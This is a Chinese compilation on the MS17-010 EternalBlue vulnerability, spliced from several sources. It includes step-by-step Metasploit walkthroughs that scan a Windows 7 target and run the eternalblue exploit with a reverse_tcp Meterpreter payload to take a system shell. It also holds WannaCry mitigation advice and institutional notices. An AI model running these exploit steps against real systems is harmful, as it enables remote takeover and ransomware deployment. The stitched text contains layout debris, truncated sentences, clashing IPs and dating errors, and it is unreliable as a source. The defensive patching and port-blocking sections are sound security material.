MS17-010(勒索病毒)

ms17-010永恒之蓝漏洞验证与利⽤如何发现永恒之蓝？利⽤漏洞之前，⾸先是要发现漏洞，那么我们在做测试的时候如何去发现漏洞呢？今天我给⼤家介绍⼀款开源免费的扫描⼯具Nessus。

Nessus号称是世界上最流⾏的漏洞扫描程序,通常包括成千上万的最新的漏洞，各种各样的扫描选项，及易于使⽤的图形界⾯和有效的报告。

在这⾥我们仅需要验证⼀台主机是否存在相印的漏洞即可。

下载地址:利⽤nessus发现永恒之蓝漏洞我在本地提前部署了未装任何安全杀毒软件、未进⾏过补丁升级的靶机作为测试环境。

以下为测试环境：Win7靶机：192.168.80.101Kali攻击机： 192.168.80.100Nessus：192.168.80.88下图为对靶机扫描的部分漏洞（摘取中⾼危漏洞）验证漏洞验证漏洞环节就需要我们⽤到kali攻击机⾥⾯的metaploit⼯具root@kali:~# msfconsole \\打开msfmsf5 > search MS17-010msf5 > use auxiliary/scanner/smb/smb_ms17_010msf5 auxiliary(scanner/smb/smb_ms17_010) > show optionsmsf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.80.101msf5 auxiliary(scanner/smb/smb_ms17_010) > show options \msf5 auxiliary(scanner/smb/smb_ms17_010) > run \\执⾏=====================以上验证了⽬标靶机存在永恒之蓝漏洞======================= msf5 > use exploit/windows/smb/ms17_010_eternalbluemsf5 exploit(windows/smb/ms17_010_eternalblue) > show optionsmsf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.80.101msf5 exploit(windows/smb/ms17_010_eternalblue) > run成功获取靶机的shellC:\Windows\system32>chcp 65001获取到shell之后就可以为所欲为啦，你就是这台机器的主⼈。

勒索病毒WannaCry解决办法
1、为计算机安装最新的安全补丁，微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞，请尽快安装此安全补丁，对于Windows XP、2003等微软已不再提供安全更新的机器，可以借助其它安全软件更新漏洞。

2、关闭445、135、137、138、139端口，关闭网络共享。

3、强化网络安全意识：不明链接不要点击，不明文件不要下载，不明邮件不要打开。

4、尽快（今后定期）备份自己电脑中的重要文件资料到移动硬盘、U盘，备份完后脱机保存该磁盘。

5、建议仍在使用Windows XP，Windows 2003操作系统的用户尽快升级到Window
7/Windows 10，或Windows 2008/2012/2016操作系统。

按下键盘的Windows键，打开控制面板
点击Windows防火墙
点击左边高级设置
点击左上角的入站规则
点击右边的新建规则
点击第二个选项→端口，点击下一步
选择TCP
在下方特定本地端口中输入135，445，点击下一步
选择第三个选项→阻止连接，点下一步，再点下一步
输入名称：比特币病毒防护，点击完成
重复一次3-10，在第7步时选择UDP
做完上面所有步骤后你会在入站规则的最上方看到两个新建的规则，这就表示完成了，保险起见，重启一下电脑。

油田网络安全预防工作措施摘要：勒索病毒的爆发，再一次引起人们对油田网络安全的关注和思考。

玉门油田一方面及时部署总公司的桌面安全管理系统2.0，一方面培养员工建立网络安全意识，养成良好的网络安全习惯，保证油田网络的安全。

关键词：勒索病毒；桌面安全管理系统；网络安全一、事件背景介绍2017年5月12日，WannaCry蠕虫病毒通过WindowsMS17-010漏洞在全球范围大规模爆发，感染了大量的计算机，随后会向计算机中植入敲诈勒索病毒，导致电脑大量文件被加密。

受害者电脑被黑客锁定后，病毒会提示支付价值相当于300美元（约合人民币2069元）的比特币才可解锁。

很快，WannaCry 勒索病毒出现了变种：WannaCry2.0，与之前版本的不同是，这个变种取消了KillSwitch，即不能通过注册某个域名来关闭变种勒索病毒的传播，该变种传播速度更快。

攻击特点：WannaCry利用Windows操作系统445端口存在的漏洞进行传播，并具有自我复制、主动传播的特性。

WannaCry主要利用了微软“视窗”系统的漏洞，以获得自动传播的能力，能够在数小时内感染一个系统内的全部电脑。

勒索病毒被漏洞远程执行后，会从资源文件夹下释放一个压缩包，此压缩包会在内存中通过密码：WNcry@2ol7解密并释放文件。

这些文件包含了后续弹出勒索框的exe，桌面背景图片的bmp，包含各国语言的勒索字体，还有辅助攻击的两个exe文件。

这些文件会释放到了本地目录，并设置为隐藏。

“永恒之蓝”是NSA 泄露的漏洞利用工具的名称，并不是该病毒的名称。

“永恒之蓝”是指NSA泄露的危险漏洞“EternalBlue”。

二、油田现阶段网络结构分析油田网络属于小型局域网，能够实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能。

拓扑结构采用星型和树型混合结构。

采取这种拓扑结构具有传输速度快、网络构形简单、建网容易、便于控制和管理的优点。

127责任编辑：赵志远 投稿信箱：netadmin@ 2019.06信息安全Security（SMB）和3389（RDP）端口，这些端口属于易被攻击的端口。

2.利用Nmap 自带的漏洞检测脚本对445端口进行扫描,结果显示存在高危漏洞，漏洞编号MS17-010。

3.该漏洞极易被利用进行远程控制，使用远程桌面登录受控电脑，上传勒索病毒（详细过程省略）。

4.本次使用的勒索病毒为GANDCRAB V5.0.4，运行之后将文件加密，文件被添加.yqqhahnck 后缀，无法正常打开，受控端桌面被替换成勒索信息，并留下索要赎金的.txt 文件。

应急响应流程根据相关技术标准，信息安全事件应急响应工作流程主要有预防预警、事件报告与先期处置、应急处置、应急结束和后期处置。

应急响应工作流程如图2所示。

1. 事件报告与先期处置从20世界60年代开始，恶意软件就与信息技术的发展相生相伴。

随着科技的不断进步，恶意软件本身也在不断演变，从蠕虫病毒、广告软件、流氓软件、木马软件，乃至今天的勒索软件，恶意软件制作者已从最初的技术炫耀变成了如今直接的利益所取。

例如2017年的Wannacry 勒索病毒，对受害企业重要数据造成严重损失。

网络黑客使用的系列勒索手段包括：频繁创建虚假网站，吸引潜在勒索对象游览；借助网站内钓鱼软件，扫描用户电脑操作系统及游览器所含安全漏洞；向用户电脑内输送勒索软件，继而锁死电脑或加密数据，要求用户支付“赎金”，以换取解除锁定的“密钥”。

演练目的为了让用户认识到勒索病毒的危害，所以很有必要还原勒索病毒入侵，以及发生勒索病毒安全事件后，迅速的应急响应和应急处置，通过应急演练，来提高我们的网络安全意识和技能。

演练环境笔者此次使用VMware Workstation 搭建两台虚拟机，模拟攻击者和被攻击者，攻击者使用Kali-Linux 系统，被攻击者使用Windows 7系统。

拓扑如图1所示。

勒索病毒攻击1.攻击者首先使用Nmap端口扫描工具对被攻击者进行端口扫描和漏洞检测。

勒索病毒感染事件处理措施
一、防护措施
1.为计算机安装最新的安全补丁，微软已发布补丁MS17-010修复该系统漏洞，请尽快安装此安全补丁，用户可以到信息中心软件正版化平台下载补丁文件。

2.为了降低此类勒索软件的传播，主动封禁135、137、138、139、445等端口。

此措施为临时措施，适当时候再解除。

3.强化网络安全意识，不明链接不要点击，不明文件不要下载，不明邮件不要打开。

4.各学院、各部门及直属单位要及时对重要业务系统数据和文件进行备份。

5.建议仍在使用windows xp操作系统的用户尽快升级到window 7/windows 10操作系统，相关升级文件请到信息中心正版化软件服务平台下载。

完成系统升级后，请安装补丁并打开windows自动更新功能。

6.各单位的托管服务器、虚拟服务器等服务器设备，也请及时或紧急做好系统升级、端口关闭等工作。

7．重要信息系统终端禁止来源不明的U盘操作。

8．师生要做好个人计算机中重要文件资料的备份工作。

二、中毒处置措施
发现感染勒索病毒的机器必须立即断网，并报告信息中心等候处理，非经允许不得擅自导出数据，防止感染其他机器。

1 / 1。

01-Smb远程代码执行漏洞(永恒之蓝)(MS17-010)修复方案漏洞概述SMB (Server Message Block) 是一种用于文件、打印机和相关服务的网络协议。

SMB远程代码执行漏洞，也被称为永恒之蓝(ETERNALBLUE)，是一种在Windows 操作系统上的漏洞，可让攻击者利用此漏洞远程执行恶意代码，无需用户交互。

该漏洞让攻击者能够远程勾画蓝屏崩溃、恶意软件传播、网络蠕虫攻击等活动。

漏洞修复方案Microsoft 在2017年发布了修复该漏洞的安全补丁。

以下是修复该漏洞的建议步骤：步骤一：安装最新的安全补丁•访问Microsoft官方网站，下载适用于Windows操作系统的最新安全补丁。

确保下载的补丁版本适用于您的操作系统和架构。

•双击下载的补丁文件，按照向导程序的步骤完成安装过程。

重启系统以完成安装。

步骤二：启用Windows自动更新•打开“Windows更新”设置，此设置通常位于“控制面板”或“设置”应用程序中。

•点击“检查更新”按钮，Windows将自动检查并下载可用的更新。

•在安装更新之前，您可以选择安装哪些更新。

确保选择了安全性补丁的安装。

步骤三：禁用SMB版本1推荐禁用SMB版本1，因为它在漏洞利用中常被攻击者滥用。

可以通过以下步骤禁用SMB版本1：1.打开“控制面板”，找到并打开“程序和功能”。

2.在左侧导航栏中选择“启用或关闭Windows功能”。

3.在“Windows功能”窗口中，找到“SMB 1.0/CIFS 文件共享支持”选项。

4.取消选中该选项，然后点击“确定”按钮。

5.随后系统将会提示您重启计算机以应用更改。

步骤四：使用防火墙规则限制SMB访问配置防火墙规则以限制SMB访问可以进一步加强系统的安全性。

您可以根据实际情况，配置适合您环境的防火墙规则。

以下是一般建议的SMB访问限制策略：1.只允许受信任的计算机使用SMB服务。

将防火墙规则配置为仅允许受信任的计算机的IP地址访问SMB端口，默认情况下SMB协议的端口是445。

关于防范勒索病毒的紧急通知校园网络用户：近日，全球多地爆发一种软件勒索病毒。

电脑感染该勒索病毒后，重要文件会被病毒加密为.onion后缀，只有缴纳高额赎金才能解密。

根据网络安全机构通报，此类勒索病毒传播扩散利用了基于445文件共享端口的SMB漏洞，微软在今年3月14日发布的MS17-010补丁，修复了该漏洞。

此次被利用的SMB漏洞影响以下未自动更新的操作系统：Windows XP/Windows 2000/Windows 2003Windows Vista/Windows Server 2008/WindowsServer 2008 R2Windows 7/Windows 8/Windows 10Windows Server 2012/Windows Server 2012 R2/Windows Server 2016 建议校园网络用户采取以下措施进行防范：1.立即停止使用Windows XP、Windows 2003等微软已不再提供安全更新的操作系统；2.升级操作系统至Windows7以上，并使用“Windows更新”更新系统补丁至最新；3.启用并打开“Windows防火墙”，进入“高级设置”，在入站规则里禁用“文件和打印机共享”等一系列相关规则或阻止135、137、138、139、445端口；4.使用“360 NSA武器库免疫工具”关闭相关服务；5.关闭135、137、138、139、445端口（附件中提供两种关闭端口的具体操作方法）。

相关参考：1.Microsoft 安全公告 MS17-010******/weishi/news.html?i=news0421p附件：关闭操作系统端口的具体操作方法关闭135、137、138、139、445端口的方法方法一：通过本地策略关闭135、137、138、139、445端口（1）在开始之前，请立刻将你的电脑断网！！！（2）Win+R打开运行，输入gpedit.msc进入组策略编辑器。

永恒之蓝漏洞利⽤windows7、windows2003——MS17_010⼀、永恒之蓝简述：永恒之蓝是指2017年4⽉14⽇晚，⿊客团体Shadow Brokers（影⼦经纪⼈）公布⼀⼤批⽹络攻击⼯具，其中包含“永恒之蓝”⼯具，“永恒之蓝”利⽤Windows系统的SMB漏洞可以获取系统最⾼权限。

5⽉12⽇，不法分⼦通过改造“永恒之蓝”制作了wannacry勒索病毒，、、整个以及中国国内多个⾼校校内⽹、⼤型企业内⽹和政府机构专⽹中招，被勒索⽀付⾼额赎⾦才能解密恢复⽂件。

⼆、SMB服务简述：SMB(全称是Server Message Block)是⼀个名，它能被⽤于连接和与服务器之间的，端⼝：445。

SMB最初是IBM的贝瑞·费根鲍姆（Barry Feigenbaum）研制的，其⽬的是将中的本地⽂件接⼝“中断13”改造为。

三、实验环境：本次攻击机器：kali linux，ip：192.168.3.110靶机两台：windows server 2003，ip：192.168.3.48windows7，ip：192.168.3.65四、复现【命令我都标红了】：⾸先攻击windows7，靶机的window7版本为旗舰版1.在kaili上使⽤nmap探测win7的端⼝信息：nmap 192.168.3.65，可以看到该机器已开启445端⼝，当然也可以查看该445端⼝的banner信息，命令nmap -sV -p445 192.168.3.65【查看下⾯图⼆】2.使⽤kali⾃带的metasploit，如果是初次使⽤，先输⼊msfconsole进⼊msf，然后键⼊search ms17_010，查询对应的模块3.可以先探测⼀下该系统是否存在永恒之蓝漏洞，当然也可以批量扫描C段，上⾯有五个模块可以选择，扫描的话使⽤auxiliary/scanner/smb/smb_ms17_010，因为⾥⾯包含了scanner，键⼊命令use auxiliary/scanner/smb/smb_ms17_010查询该模块需要的参数，命令show options，可以看到主要的参数是攻击的主机RHOSTS，设置参数：set rhosts 192.168.3.65【不分⼤⼩写】，再键⼊show options 即可查看是否成功赋值上，如果写错了可以选择unset rhosts来取消重新选择4.使⽤run或者exploit命令即可成功查询，可以看到，Host is likely VULNERABLE to MS17-010!【主机可能容易受到MS17-010的攻击!】，证明可能存在永恒之蓝漏洞，下⾯开始利⽤5.漏洞利⽤，回到刚才的ms17_010模块，win7需要使⽤exploit/windows/smb/ms17_010_eternalblue，windows2003使⽤exploit/windows/smb/ms17_010_psexec，win8那个没试过。

ms17-010-永恒之蓝漏洞利用教程(漏洞复现)实验环境：虚拟机：kali-linux windows 7 请自行下载安装1.打开虚拟机启动kali-linux 启动windows7（未装补丁）2.获取IP地址（ifconfig ipconfig）kali-linux ：192.168.0.129windows7 ：192.168.0.1303. kali-linux输入msfconsole启动msf（若不是root登陆需sudo 提升权限）root@bogon:~# msfconsole命令提示行显示msf则启动成功。

4. 使用永恒之蓝漏洞msf > use exploit/windows/smb/ms17_010_eternalblue5. 设定靶机IP 和操作机IP192.168.18.129为操作机kali-linux ip地址192.168.18.130为靶机windows 7 ip地址msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 192.168.18.130msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 192.168.18.1296. 设置TCP连接msf exploit (windows/smb/ms17_010_eternalblue)>set paylo ad windows/x64/meterpreter/reverse_tcp7.攻击msf exploit (windows/smb/ms17_010_eternalblue) > run测试：已成功获得windows管理员权限。

注意：虚拟机：windows XP 或者Win7 （未打永恒之蓝补丁，镜像msdn也可以下载）。

ms17_010_eternalblue 原理
MS17-010（也称为EternalBlue）是一种远程执行代码（RCE）漏洞，影响微软Windows操作系统中SMBv1协议的实现。

SMBv1（Server Message Block version 1）是一种用于共享文件、打印机和其他网络资源的协议。

EternalBlue利用了SMBv1协议的一个漏洞，该漏洞允许攻击
者在受影响的系统上执行任意的远程代码。

攻击者可以通过向目标系统发送恶意的SMBv1请求来利用此漏洞。

此漏洞的利
用不需要目标系统上的任何用户交互。

具体而言，EternalBlue的原理如下：
1. 攻击者向目标系统发送一个特制的SMBv1请求，该请求包
含了一个缓冲区溢出漏洞，其中包含了恶意代码。

2. 目标系统接收到该请求并且解析其中的数据时，由于漏洞的存在，会导致缓冲区溢出。

3. 缓冲区溢出使得攻击者能够将恶意代码写入目标系统的内存中，并获得执行代码的控制权。

4. 攻击者利用控制权，可以执行任意代码，例如下载和安装恶意软件，窃取敏感数据，操控目标系统等。

EternalBlue漏洞在2017年被公开，被盗取的美国国家安全局（NSA）工具包中首次引入了这个漏洞。

由于该漏洞的严重
性和广泛的受影响范围，大约一年后，它被用于发起了WannaCry和NotPetya等全球性的勒索软件攻击。

微软随后发
布了安全补丁来修复此漏洞，并且强烈建议用户及时更新其系统。